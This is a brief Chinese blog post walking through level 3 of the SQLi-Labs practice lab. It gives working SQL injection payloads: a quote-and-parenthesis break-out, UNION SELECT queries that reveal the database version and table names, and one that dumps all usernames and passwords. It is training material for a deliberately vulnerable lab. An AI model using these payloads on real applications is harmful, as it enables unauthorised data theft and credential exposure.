互动

SQLiLabs打靶-第三关

loker66fan 字数: 4155 阅读耗时: 10 分钟 2024/06/15 博客独享热度: 24 评论: 0

loekr的摘要机器人

洪墨AI

生成中...

SQLiLabs打靶

sqli-labs第三关

?id=10'       '后显示

输入内容为
10'

所以通过下面代码构建就可以进行sql注入。后面所有代码以此为基础进行构造。

?id=1')--+
?id=-1') union select 1, version(), database()--+

然后一样

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

第三关结束

原创 SQLiLabs打靶-第三关

SQLiLabs打靶-第三关

本文是原创文章，采用 CC BY-NC-ND 4.0 协议，完整转载请注明来自 loekr

匿名评论隐私政策

你无需删除空行，直接评论以获取最佳展示效果

Steam卡片